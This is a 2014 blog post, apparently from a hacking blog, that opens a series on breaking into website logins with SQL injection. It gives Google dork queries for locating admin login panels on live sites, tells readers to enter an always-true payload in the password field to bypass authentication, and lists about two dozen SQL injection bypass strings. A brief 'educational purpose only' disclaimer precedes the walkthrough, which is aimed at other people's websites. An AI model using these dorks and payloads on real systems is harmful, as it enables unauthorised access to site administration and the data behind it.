28 Jul 2014

Hack Websites Using SQL Injection : Part 1

Hi Folks,

This is the first article from my four article series based on SQL injection.
In this article, we'll cover How to Hack the website login by using SQL injection.

Note: This article is for educational purpose only. Hack The Dark will not be responsible for any misuse or any harm caused to any property or person or anything else.

Warning: Unethical hacking to anyone's website is illegal and it may can put your ass behind the bars.

Alright, let go ahead
first, we need to find the admin login panel or whatever login panel you want to hack. If you have a basic knowledge of server based scripting then you can create a basic login page to test SQL injection.

You can use basic Google dorks to find the login panel:

inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx


Go the vulnerable link. You'll see the login panel asking for Email & Password.

You can put any random record in Username / Email field like administrator / admin@domain.com

For Password, you can use something like: ‘or’1′=’1
Hit login and you're done ;)

Some dumb head folks, put restrictions with specific SQL strings.
Find below the list of commonly used SQL injections:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

If you know the basic of SQL you can always create your own strings, which however I'll cover in future article of this series.

Keep Learning. Keep Rocking. :)

0 comments:

Post a Comment

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Online Project management